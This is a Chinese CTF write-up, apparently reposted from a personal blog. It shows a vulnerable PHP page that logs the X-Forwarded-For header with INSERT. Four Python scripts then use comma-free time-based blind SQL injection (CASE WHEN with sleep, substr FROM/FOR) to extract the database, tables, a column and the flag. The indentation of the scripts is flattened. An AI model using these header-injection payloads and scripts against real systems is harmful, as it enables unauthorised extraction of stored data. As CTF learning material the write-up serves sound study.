考察:
- xff头注入
- insert into 注入格式是
1'+(注入语句)#
- 延时注入
- 逗号屏蔽
$ip_arr = explode(',', $ip);
下无法使用if注入以及对substr函数修改引出的启发
给出了源码提示:
<?php
error_reporting(0);
function getIp(){
$ip = '';
if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
$ip = $_SERVER['REMOTE_ADDR'];
}
$ip_arr = explode(',', $ip);
##过滤了逗号
return $ip_arr[0];
}
$host="localhost";
$user="";
$pass="";
$db="";
$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");
mysql_select_db($db) or die("Unable to select database");
$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);
?>
过滤了逗号,并且是insert 注入
我们先来看一下insert注入方法,没有报错,没有查询,只能延时注入
有延迟,可以延时注入
可是过滤了逗号,就没办法用if语句了
但是还有一种判断执行语句:select case when 判断条件 then 执行语句1 else 执行语句2 end
ok,成功延时,那么最后考虑注入的判断条件,正常来说是用substr函数一位一位的截取判断,但是我们之前实用的substr函数也都是需要用到逗号的,怎么办呢
get了另外一种substr函数的使用方法:substr(database() from 1 for 1) = substr(database(),1,1)
接下来只需要写个脚本注入就可以了
先注出数据库名:
import requests
url = "http://123.206.87.240:8002/web15/"
allString = '''1234567890~`!@#$%^&*()-_=+[]{};:'"|\,<.>/?qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'''
databaseName = ''
flag = 1
for i in range(1,10):
for j in allString:
header1 = {
"X-Forwarded-For":"1'+(select case when (ascii(substr(database() from %d for 1))=%d) then sleep(3) else 0 end))#"%(i,ord(j))
}
r = requests.get(url,headers = header1)
t = r.elapsed.total_seconds()
#print('the time of '+j+' is '+str(t))
if t>=3 :
print("No."+str(i)+" is "+str(j))
databaseName = databaseName + j
break
elif t<3 and str(j)=='M' :
flag = 0
break
if flag==0 :
break
print("databaseName:"+databaseName)
结果:
数据名为web15
注表名:
import requests
url="http://123.206.87.240:8002/web15/"
allString='''1234567890~`!@#$%^&*()-_=+[]{};:'"|\,<.>/?qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'''
tableName=''
flag=1
for i in range(1,20):
for j in allString:
header1={
# "X-Forwarded-For":"1'+(select case when (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()) from %d for 1))=%d) then sleep(3) else 0 end))#"%(i,ord(j))
"X-Forwarded-For":"1'+(select case when (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema = database()) from %d for 1))=%d) then sleep(3) else 0 end))#" %(i,ord(j))
}
r = requests.get(url,headers = header1)
t = r.elapsed.total_seconds()
print("the time of "+j+" is "+str(t))
if t>=3 :
print("No."+str(i)+" is "+j)
tableName = tableName + j
break
elif t<3 and j=="M":
flag=0
break
if flag == 0:
break
print("tableName:"+tableName)
这里需要考虑一下服务器有可能自身会延迟,所以我将延迟定在3秒到4秒内
结果:
表名:client_ip,flag
注flag表下的列名:
import requests
url="http://123.206.87.240:8002/web15/"
allString='''1234567890~`!@#$%^&*()-_=+[]{};:'"|\,<.>/?qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'''
colName=''
flag=1
for i in range(1,20):
for j in allString:
header1={
# "1'+(select case when (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag') from %d for 1))=%d) then sleep(3) else 0 end))#"%(i,ord(j))
"X-Forwarded-For":"1'+(select case when( ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag') from %d for 1))=%d) then sleep(3) else 0 end))#" %(i,ord(j))
}
r = requests.get(url,headers = header1)
t = r.elapsed.total_seconds()
print("time of "+j+" is "+str(t))
if t>=3:
print("No."+str(i)+" is "+j)
colName = colName+j
break
elif t<3 and j=="M":
flag=0
break
if flag==0:
break
print("colName: "+colName)
结果:
列名为flag
最后注出flag列下的信息
import requests
url="http://123.206.87.240:8002/web15/"
allString='''1234567890~`!@#$%^&*()-_=+[]{};:'"|\,<.>/?qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'''
Name=''
flag=1
for i in range(1,40):
for j in allString:
header1={
# "1'+(select case when (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag') from %d for 1))=%d) then sleep(3) else 0 end))#"%(i,ord(j))
"X-Forwarded-For":"1'+(select case when( ascii(substr((select group_concat(flag) from flag ) from %d for 1))=%d) then sleep(3) else 0 end))#" %(i,ord(j))
}
r = requests.get(url,headers = header1)
t = r.elapsed.total_seconds()
print("time of "+j+" is "+str(t))
if t>=3:
print("No."+str(i)+" is "+j)
Name = Name+j
break
elif t<3 and j=="M":
flag=0
break
if flag==0:
break
print("flagName: "+Name)
最后的flag:flag{cdbf14c9551d5be5612f7bb5d2867853}
作者:Somnus
链接:https://foxgrin.github.io/posts/26423/#INSERT-INTO%E6%B3%A8%E5%85%A5
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。